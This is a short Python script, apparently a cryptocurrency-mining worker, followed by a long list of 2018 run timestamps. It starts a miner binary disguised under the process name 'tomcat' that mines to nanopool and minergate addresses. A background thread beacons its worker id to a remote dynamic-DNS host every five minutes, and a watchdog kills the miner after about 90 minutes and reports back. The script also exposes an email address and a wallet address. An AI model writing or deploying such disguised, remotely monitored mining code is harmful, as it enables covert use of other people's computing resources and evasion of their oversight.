import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:07.265169
#2018-02-17 17:19:05.755280
#2018-02-17 19:07:01.814805
#2018-02-17 20:54:06.642882
#2018-02-17 22:41:04.280242
#2018-02-18 00:25:08.580628
#2018-02-18 02:16:05.192554
#2018-02-18 04:02:07.077561
#2018-02-18 05:53:05.901759
#2018-02-18 07:44:05.411130
#2018-02-18 09:33:07.664690
#2018-02-18 11:19:03.766582
#2018-02-18 13:05:02.055707
#2018-02-18 14:52:06.954677
#2018-02-18 16:41:01.920101
#2018-02-18 18:30:04.355188
#2018-02-18 20:18:07.735241
#2018-02-18 22:03:03.376117
#2018-02-18 23:52:01.879710
#2018-02-19 01:38:05.744430
#2018-02-19 03:26:05.345528
#2018-02-19 05:11:01.482668
#2018-02-19 06:57:01.298254
#2018-02-19 08:47:07.754407
#2018-02-19 10:37:02.090205
#2018-02-19 12:24:03.966534
#2018-02-19 14:11:01.715532
#2018-02-19 16:01:07.766293
#2018-02-19 17:50:08.724865
#2018-02-19 19:38:01.703207
#2018-02-19 21:27:01.783192
#2018-02-19 23:12:01.536750
#2018-02-20 00:57:06.016575
#2018-02-20 02:49:05.685056
#2018-02-20 04:36:05.473192
#2018-02-20 06:20:06.455152
#2018-02-20 08:05:07.571225
#2018-02-20 09:51:08.062830
#2018-02-20 11:35:01.772608
#2018-02-20 13:21:07.134312
#2018-02-20 15:06:08.626211
#2018-02-20 16:50:12.695218
#2018-02-20 18:39:01.330093
#2018-02-20 20:29:08.199424
#2018-02-20 22:15:04.751758
#2018-02-20 23:56:06.459950
#2018-02-21 01:43:06.405277
#2018-02-21 03:32:06.597055
#2018-02-21 05:19:05.904849
#2018-02-21 07:08:01.403734
#2018-02-21 08:53:06.860687
#2018-02-21 10:40:07.005875
#2018-02-21 12:29:01.581036
#2018-02-21 14:15:04.716451
#2018-02-21 16:02:06.786753
#2018-02-21 17:54:02.198543
#2018-02-21 19:41:07.906239
#2018-02-21 21:28:04.513987
#2018-02-21 23:14:05.827067
#2018-02-22 01:04:07.184842
#2018-02-22 02:51:06.112141
#2018-02-22 04:38:06.353719
#2018-02-22 06:22:06.626863
#2018-02-22 08:09:04.821792
#2018-02-22 09:57:01.613217
#2018-02-22 11:42:07.798186
#2018-02-22 13:28:08.374312
#2018-02-22 15:17:09.340682
#2018-02-22 17:03:07.684478
#2018-02-22 18:51:01.667229
#2018-02-22 20:44:05.776177
#2018-02-22 22:30:09.694586
#2018-02-23 00:16:01.308887
#2018-02-23 02:04:02.036945
#2018-02-23 03:50:01.581071
#2018-02-23 05:37:05.111665
#2018-02-23 07:22:06.361931
#2018-02-23 09:26:06.901977
#2018-02-23 11:31:08.559501
#2018-02-23 13:22:07.399633
#2018-02-23 15:07:08.145652
#2018-02-23 16:57:04.656053
#2018-02-23 18:58:01.789182
#2018-02-23 20:44:07.503007
#2018-02-23 22:32:05.973602
#2018-02-24 00:18:06.997236
#2018-02-24 02:09:04.147970
#2018-02-24 03:58:07.643237
#2018-02-24 05:44:04.593993
#2018-02-24 07:37:07.340877
#2018-02-24 09:24:03.848028
#2018-02-24 11:17:06.267855
#2018-02-24 13:06:05.446661
#2018-02-24 14:57:01.961055
#2018-02-24 16:47:01.305111
#2018-02-24 18:34:06.384569
#2018-02-24 20:21:06.143911
#2018-02-24 22:17:06.267838
#2018-02-25 01:26:02.019998
#2018-02-25 05:13:07.684860
#2018-02-25 11:01:01.800021